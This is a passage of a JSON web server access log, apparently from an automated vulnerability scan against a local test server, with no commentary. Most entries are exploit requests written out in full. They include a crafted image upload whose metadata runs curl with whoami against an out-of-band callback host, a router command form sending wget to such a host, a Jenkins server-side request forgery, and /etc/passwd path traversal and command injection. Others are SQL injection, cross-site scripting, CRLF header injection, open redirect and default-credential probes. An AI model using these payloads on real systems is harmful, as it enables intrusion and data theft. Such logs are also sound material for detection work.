+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.ca28fg0smpvbd3qg07h0qezjqot5idhx9.oast.live} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://ca28fg0smpvbd3qg07h0wtbhi4qxck34g.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"29KD1zheVcaoOfNzoc97VSPcsqT","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/xweb500.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/supportInstaller HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"MSIE", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://ca28fg0smpvbd3qg07h0mnsktj687h6sy.oast.live","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", 